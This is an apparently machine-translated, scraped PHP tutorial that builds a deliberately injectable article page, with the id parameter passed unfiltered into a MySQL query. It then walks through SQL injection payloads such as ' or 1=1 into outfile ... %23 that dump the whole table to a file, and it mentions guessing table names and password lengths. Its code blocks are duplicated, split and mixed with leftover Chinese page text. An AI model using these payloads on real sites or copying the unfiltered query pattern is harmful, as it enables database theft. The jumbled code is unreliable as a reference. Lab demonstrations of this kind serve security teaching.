Analysis of SQL injection vulnerability drag library principle for sql security_PHP tutorial

This article uses some of my own experience to tell you how hacker friends will use the SQL vulnerability of your database to download your database. Please refer to this article if necessary.

Create a table in the database:

The code is as follows

Copy code

代码如下	复制代码
CREATE TABLE `article` (   `articleid` int(11) NOT NULL AUTO_INCREMENT,   `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',   `content` text CHARACTER SET utf8 NOT NULL,   PRIMARY KEY (`articleid`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

CREATE TABLE `article` (

`articleid` int(11) NOT NULL AUTO_INCREMENT,

`title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',

`content` text CHARACTER SET utf8 NOT NULL,

PRIMARY KEY (`articleid`)

代码如下

复制代码

$servername = "localhost";        $dbusername = "root";        $dbpassword = "";        $dbname = "test";        $id=$_GET['id'];//id未经过滤        $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");        mysql_select_db($dbname,$conn);        mysql_query('set names utf8');        $sql = "SELECT * FROM article WHERE articleid='$id'";        $result = mysql_query($sql,$conn);        $row = mysql_fetch_array($result);        echo " 利用SQL注入漏洞拖库 ";        if (!$row){               echo "该记录不存在";               exit;        }        echo "标题 ".$row['title']." ";        echo "内容 ".$row['content']." "; ?>

) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

代码如下	复制代码
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1

I will not post the code for inserting data into the table. You can download it and import it directly into the database.

Next, write a page that handles user requests. Here, we deliberately do not filter the data submitted by the user, leaving a SQL injection vulnerability for testing.

The code is as follows:

The code is as follows

Copy code

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

代码如下	复制代码
’ into outfile 'e:/sql.txt'%23

$dbname = "test"; $id=$_GET['id'];//id is not filtered $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("Database connection failed"); mysql_select_db($dbname,$conn); mysql_query('set names utf8'); $sql = "SELECT * FROM article WHERE articleid='$id'"; $result = mysql_query($sql,$conn); $row = mysql_fetch_array($result); echo "

Drag library using SQL injection vulnerability

"; if (!$row){ echo "The record does not exist"; exit; } echo "title
".$row['title']."

"; echo "Content
".$row['content']."

"; ?>

We type directly into the browser:

The code is as follows	Copy code
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1

You can access a record with id 1 in the article table The access results are as follows: Next, we will use this vulnerability (if we don’t know the vulnerability, we can only use tools + manual detection) to demonstrate how to download the article table. Enter in the address bar:

Analysis: %23 is the ASCII code of #. Since entering # directly in the address bar will become empty in the database system, you need to enter %23 in the address bar, then it will become # and then be commented out. The following sql statement.

After running, open the E drive and find an additional sql.txt file. After opening, there is a record in the table article.

Why is there only one record? Does this data table only have one record? This is not the case, because we only retrieve one record with id 1, so can we download all the records in the article table at once?

The answer is yes, as long as your constructed SQL statement is flexible enough (again, the flexibility of constructed SQL statements is brought up).

Analysis, when you enter 'into outfile 'e:/sql.txt'%23 in the URL address bar, it is merged into the sql query statement and becomes:

If you don’t believe it, just do it...

The code is as follows

代码如下	复制代码
SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'

Copy code

SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'

代码如下	复制代码
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'

After careful analysis, we can construct the SQL statement like this:

代码如下	复制代码
SELECT * FROM article into outfile 'e:/whf.txt'#'

In this case, the WHERE clause is always true no matter what. In other words, the sql statement is equivalent to the following:

Understood, the sql statement first executes the select statement to retrieve all the contents in the table article, and then executes into outfile 'e:/whf.txt'#' to export the contents.

Using SQL injection vulnerabilities, we can guess the table name, column name, user password length (LEFT function), etc. Of course, if we can directly export all the data in the table like the above demonstration, there is no need. Guess table names, column names, etc. http://www.bkjia.com/PHPjc/632941.htmlwww.bkjia.comtrue

http: //www.bkjia.com/PHPjc/632941.html

TechArticle

This article uses some of my own experience to tell you how hacker friends will use the SQL vulnerability of your database to defeat you Download the database, please refer to this article if necessary. In data...